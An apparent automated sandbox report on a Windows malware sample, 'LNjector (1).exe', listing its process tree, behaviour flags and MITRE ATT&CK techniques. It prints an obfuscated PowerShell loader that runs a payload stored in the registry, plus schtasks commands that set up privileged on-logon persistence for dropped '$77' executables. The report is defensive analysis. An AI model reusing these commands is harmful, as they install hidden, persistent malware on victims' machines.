ubkey(''+'S'+'O'+[Char](70)+''+[Char](84)+'WA'+'R'+''+[Char](69)+'').GetValue(''+'$'+''+[Char](55)+''+[Char](55)+''+[Char](115)+''+[Char](116)+''+[Char](97)+''+'g'+''+[Char](101)+'r')).EntryPoint.Invoke($Null,$Null)"
  2⤵
  - Suspicious use of NtCreateUserProcessOtherParentProcess
  - Command and Scripting Interpreter: PowerShell
  - Drops file in System32 directory
  - Suspicious use of SetThreadContext
  - Modifies data under HKEY_USERS
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  - Suspicious use of WriteProcessMemory
  PID:4604

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s ProfSvc
1⤵
PID:1272

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalService -p -s nsi
1⤵
PID:1312

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalService -p -s DispBrokerDesktopSvc
1⤵
PID:1336

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s UserManager
1⤵
PID:1456
- C:\Windows\system32\sihost.exe
  sihost.exe
  2⤵
  - Modifies registry class
  PID:2900

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p -s Dhcp
1⤵
PID:1468

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalService -p -s EventSystem
1⤵
PID:1476

C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k netsvcs -p -s Themes
1⤵
PID:1492

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s SENS
1⤵
PID:1616

C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k NetworkService -p -s NlaSvc
1⤵
PID:1692

C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s AudioEndpointBuilder
1⤵
PID:1740

C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k LocalService -p -s netprofm
1⤵
PID:1816

C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p
1⤵
PID:1828

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k NetworkService -p -s Dnscache
1⤵
PID:1908

C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p
1⤵
PID:1912

C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k netsvcs -p -s ShellHWDetection
1⤵
PID:1976

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k appmodel -p -s StateRepository
1⤵
PID:2000

C:\Windows\System32\spoolsv.exe
C:\Windows\System32\spoolsv.exe
1⤵
PID:1544

C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -s RmSvc
1⤵
PID:2136

C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k NetworkService -p -s LanmanWorkstation
1⤵
PID:2164

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s Winmgmt
1⤵
- Suspicious use of AdjustPrivilegeToken
PID:2280

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s IKEEXT
1⤵
PID:2416

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k NetworkServiceNetworkRestricted -p -s PolicyAgent
1⤵
PID:2424

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k NetworkService -p -s CryptSvc
1⤵
- Drops file in System32 directory
PID:2468

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s LanmanServer
1⤵
- Suspicious use of AdjustPrivilegeToken
PID:2568

C:\Windows\sysmon.exe
C:\Windows\sysmon.exe
1⤵
PID:2600

C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s TrkWks
1⤵
PID:2636

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s WpnService
1⤵
PID:2644

C:\Windows\system32\wbem\unsecapp.exe
C:\Windows\system32\wbem\unsecapp.exe -Embedding
1⤵
PID:2948

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k UnistackSvcGroup -s CDPUserSvc
1⤵
PID:2992

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s TokenBroker
1⤵
PID:3196

C:\Windows\Explorer.EXE
C:\Windows\Explorer.EXE
1⤵
- Modifies Internet Explorer settings
- Modifies registry class
- Suspicious behavior: AddClipboardFormatListener
- Suspicious behavior: GetForegroundWindowSpam
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
- Suspicious use of SetWindowsHookEx
PID:3452
- C:\Users\Admin\AppData\Local\Temp\LNjector (1).exe
  "C:\Users\Admin\AppData\Local\Temp\LNjector (1).exe"
  2⤵
  - Checks computer location settings
  - Modifies registry class
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious behavior: GetForegroundWindowSpam
  - Suspicious use of AdjustPrivilegeToken
  - Suspicious use of FindShellTrayWindow
  - Suspicious use of SetWindowsHookEx
  - Suspicious use of WriteProcessMemory
  PID:1220
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    "powershell.exe"
    3⤵
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    PID:3664
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    "powershell.exe"
    3⤵
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    PID:4188
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    "powershell.exe"
    3⤵
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    PID:456
- - C:\Users\Admin\AppData\Local\Temp\03075cf2-9b61-4396-98c8-fd9cb959cfb9.exe
    "C:\Users\Admin\AppData\Local\Temp\03075cf2-9b61-4396-98c8-fd9cb959cfb9.exe"
    3⤵
    - Checks computer location settings
    - Executes dropped EXE
    - Drops file in System32 directory
    - System Location Discovery: System Language Discovery
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    - Suspicious use of WriteProcessMemory
    PID:2180
  - - C:\Windows\SysWOW64\cmd.exe
      "C:\Windows\System32\cmd.exe" /c schtasks /create /f /sc onlogon /rl highest /tn "$77oui" /tr '"C:\Windows\SysWOW64\$77oui.exe"' & exit
      4⤵
      System Location Discovery: System Language Discovery
      Suspicious use of WriteProcessMemory
      PID:4564
    - - C:\Windows\SysWOW64\schtasks.exe
        
        schtasks /create /f /sc onlogon /rl highest /tn "$77oui" /tr '"C:\Windows\SysWOW64\$77oui.exe"'
        5⤵
        System Location Discovery: System Language Discovery
        Scheduled Task/Job: Scheduled Task
        
        PID:3296
  - - C:\Windows\SysWOW64\cmd.exe
      C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\tmp15B6.tmp.bat""
      4⤵
      System Location Discovery: System Language Discovery
      Suspicious use of WriteProcessMemory
      PID:1984
    - - C:\Windows\SysWOW64\timeout.exe
        
        timeout 3
        5⤵
        System Location Discovery: System Language Discovery
        Delays execution with timeout.exe
        
        PID:5108
    - - C:\Windows\SysWOW64\$77oui.exe
        
        "C:\Windows\SysWOW64\$77oui.exe"
        5⤵
        Executes dropped EXE
        System Location Discovery: System Language Discovery
        Suspicious use of AdjustPrivilegeToken
        
        PID:4008
- - C:\Users\Admin\AppData\Local\Temp\acc449ba-d046-4b86-956f-10f8d1ac6d73.exe
    "C:\Users\Admin\AppData\Local\Temp\acc449ba-d046-4b86-956f-10f8d1ac6d73.exe"
    3⤵
    - Checks computer location settings
    - Executes dropped EXE
    - Drops file in System32 directory
    - System Location Discovery: System Language Discovery
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    - Suspicious use of WriteProcessMemory
    PID:1664
  - - C:\Windows\SysWOW64\cmd.exe
      "C:\Windows\System32\cmd.exe" /c schtasks /create /f /sc onlogon /rl highest /tn "$77non" /tr '"C:\Windows\SysWOW64\$77non.exe"' & exit
      4⤵
      System Location Discovery: System Language Discovery
      Suspicious use of WriteProcessMemory
      PID:4336
    - - C:\Windows\SysWOW64\schtasks.exe
        
        schtasks /create /f /sc onlogon /rl highest /tn "$77non" /tr '"C:\Windows\SysWOW64\$77non.exe"'
        5⤵
        System Location Discovery: System Language Discovery
        Scheduled Task/Job: Scheduled Task
        
        PID:4732
  - - C:\Windows\SysWOW64\cmd.exe
      C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\tmp15B7.tmp.bat""
      4⤵
      System Location Discovery: System Language Discovery
      Suspicious use of WriteProcessMemory
      PID:748
    - - C:\Windows\SysWOW64\timeout.exe
        
        timeout 3
        5⤵
        System Location Discovery: System Language Discovery
        Delays execution with timeout.exe
        
        PID:3688
    - - C:\Windows\SysWOW64\$77non.exe
        
        "C:\Windows\SysWOW64\$77non.exe"
        5⤵
        Executes dropped EXE
        System Location Discovery: System Language Discovery
        Suspicious use of AdjustPrivilegeToken
        
        PID:3684
- - C:\Users\Admin\AppData\Local\Temp\369e383a-9351-4c3d-ad14-5c551fd60479.exe
    "C:\Users\Admin\AppData\Local\Temp\369e383a-9351-4c3d-ad14-5c551fd60479.exe"
    3⤵
    - Executes dropped EXE
    - System Location Discovery: System Language Discovery
    PID:3568
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --profile-directory=Default
  2⤵
  - Enumerates system info in registry
  - Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
  - Suspicious use of FindShellTrayWindow
  - Suspicious use of SendNotifyMessage
  PID:4988
- - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
    "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0x13c,0x140,0x144,0x118,0x148,0x7ff83af746f8,0x7ff83af74708,0x7ff83af74718
    3⤵
    PID:2268
- - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
    "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2084,190968999088484323,11662635058226681574,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=2120 /prefetch:2
    3⤵
    PID:3768
- - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
    "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=2084,190968999088484323,11662635058226681574,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2208 /prefetch:3
    3⤵
    PID:4356
- - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
    "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --field-trial-handle=2084,190968999088484323,11662635058226681574,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2736 /prefetch:8
    3⤵
    PID:3432
- - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
    "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2084,190968999088484323,11662635058226681574,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3444 /prefetch:1
    3⤵
    PID:1892
- - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
    "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2084,190968999088484323,11662635058226681574,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3456 /prefetch:1
    3⤵
    PID:4732
- - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
    "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2084,190968999088484323,11662635058226681574,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=7 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4252 /prefetch:1
    3⤵
    PID:5232
- - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
    "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2084,190968999088484323,11662635058226681574,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=8 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5036 /prefetch:1
    3⤵
    PID:5244
- - C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe
    "C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=2084,190968999088484323,11662635058226681574,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=3444 /prefetch:8
    3⤵
    PID:5464
- - C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe
    "C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=2084,190968999088484323,11662635058226681574,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=3444 /prefetch:8
    3⤵
    PID:5484
- - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
    "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2084,190968999088484323,11662635058226681574,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=10 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3684 /prefetch:1
    3⤵
    PID:5668
- - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
    "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2084,190968999088484323,11662635058226681574,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=11 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4280 /prefetch:1
    3⤵
    PID:5680
- - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
    "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2084,190968999088484323,11662635058226681574,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=12 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5620 /prefetch:1
    3⤵
    PID:5852
- - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
    "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2084,190968999088484323,11662635058226681574,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=13 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5376 /prefetch:1
    3⤵
    PID:6096
- - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
    "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2084,190968999088484323,11662635058226681574,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=14 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5808 /prefetch:1
    3⤵
    PID:1768
- - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
    "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2084,190968999088484323,11662635058226681574,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=15 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5900 /prefetch:1
    3⤵
    PID:4244
- - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
    "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2084,190968999088484323,11662635058226681574,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=16 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5880 /prefetch:1
    3⤵
    PID:5688
- - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
    "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2084,190968999088484323,11662635058226681574,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=17 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5344 /prefetch:1
    3⤵
    PID:5344
- - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
    "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=edge_collections.mojom.CollectionsDataManager --field-trial-handle=2084,190968999088484323,11662635058226681574,131072 --lang=en-US --service-sandbox-type=collections --mojo-platform-channel-handle=5400 /prefetch:8
    3⤵
    PID:2712
- - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
    "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2084,190968999088484323,11662635058226681574,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=20 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3276 /prefetch:1
    3⤵
    PID:5460
- - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
    "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=quarantine.mojom.Quarantine --field-trial-handle=2084,190968999088484323,11662635058226681574,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5108 /prefetch:8
    3⤵
    PID:1736

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalService -p -s CDPSvc
1⤵
PID:3460

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k ClipboardSvcGroup -p -s cbdhsvc
1⤵
PID:3620

C:\Windows\system32\DllHost.exe
C:\Windows\system32\DllHost.exe /Processid:{3EB3C877-1F16-487C-9050-104DBCD66683}
1⤵
PID:3824

C:\Windows\System32\RuntimeBroker.exe
C:\Windows\System32\RuntimeBroker.exe -Embedding
1⤵
PID:3980

C:\Windows\System32\RuntimeBroker.exe
C:\Windows\System32\RuntimeBroker.exe -Embedding
1⤵
- Suspicious use of UnmapMainImage
PID:4216

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s wlidsvc
1⤵
PID:4916

C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s StorSvc
1⤵
PID:4636

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalServiceAndNoImpersonation -p -s SSDPSRV
1⤵
PID:532

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p -s WinHttpAutoProxySvc
1⤵
- Modifies data under HKEY_USERS
PID:3104

C:\Windows\system32\SppExtComObj.exe
C:\Windows\system32\SppExtComObj.exe -Embedding
1⤵
PID:3952

C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k LocalService -p -s LicenseManager
1⤵
PID:4460

C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe
"C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe" /service
1⤵
- Drops file in System32 directory
- Modifies data under HKEY_USERS
PID:4232

C:\Windows\system32\DllHost.exe
C:\Windows\system32\DllHost.exe /Processid:{3EB3C877-1F16-487C-9050-104DBCD66683}
1⤵
PID:1428

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p -s NgcCtnrSvc
1⤵
PID:3836

C:\Windows\System32\RuntimeBroker.exe
C:\Windows\System32\RuntimeBroker.exe -Embedding
1⤵
PID:4072

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s Appinfo
1⤵
PID:2316

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k appmodel -p -s camsvc
1⤵
PID:608

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s wuauserv
1⤵
PID:2108

C:\Windows\system32\wbem\wmiprvse.exe
C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding
1⤵
- Checks BIOS information in registry
- Checks SCSI registry key(s)
- Enumerates system info in registry
PID:1604

C:\Windows\servicing\TrustedInstaller.exe
C:\Windows\servicing\TrustedInstaller.exe
1⤵
PID:1608

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s UsoSvc
1⤵
PID:2232

C:\Windows\System32\mousocoreworker.exe
C:\Windows\System32\mousocoreworker.exe -Embedding
1⤵
PID:3964

C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.19041.1220_none_7e21bc567c7ed16b\TiWorker.exe
C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.19041.1220_none_7e21bc567c7ed16b\TiWorker.exe -Embedding
1⤵
PID:4520

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalSystemNetworkRestricted -p -s PcaSvc
1⤵
PID:1380

C:\Windows\System32\CompPkgSrv.exe
C:\Windows\System32\CompPkgSrv.exe -Embedding
1⤵
PID:640

C:\Windows\System32\CompPkgSrv.exe
C:\Windows\System32\CompPkgSrv.exe -Embedding
1⤵
PID:3000

C:\Windows\System32\RuntimeBroker.exe
C:\Windows\System32\RuntimeBroker.exe -Embedding
1⤵
PID:3528

C:\Windows\System32\rundll32.exe
C:\Windows\System32\rundll32.exe C:\Windows\System32\shell32.dll,SHCreateLocalServerRunDll {9aa46009-3ce0-458a-a354-715610a075e6} -Embedding
1⤵
PID:3832

C:\Windows\system32\DllHost.exe
C:\Windows\system32\DllHost.exe /Processid:{AB8902B4-09CA-4BB6-B78D-A8F59079A8D5}
1⤵
PID:6128

C:\Windows\system32\DllHost.exe
C:\Windows\system32\DllHost.exe /Processid:{AB8902B4-09CA-4BB6-B78D-A8F59079A8D5}
1⤵
PID:2500

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Command and Scripting Interpreter

T1059

PowerShell

T1059.001

Scheduled Task/Job

T1053

Scheduled Task

Persistence

Scheduled Task/Job

T1053

Scheduled Task

Privilege Escalation

Scheduled Task/Job

T1053

Scheduled Task

Defense Evasion

Indicator Removal

T1070

Clear Windows Event Logs

T1070.001

Modify Registry

T1112

Credential Access

Discovery

Browser Information Discovery

T1217

Peripheral Device Discovery

T1120

Query Registry

System Information Discovery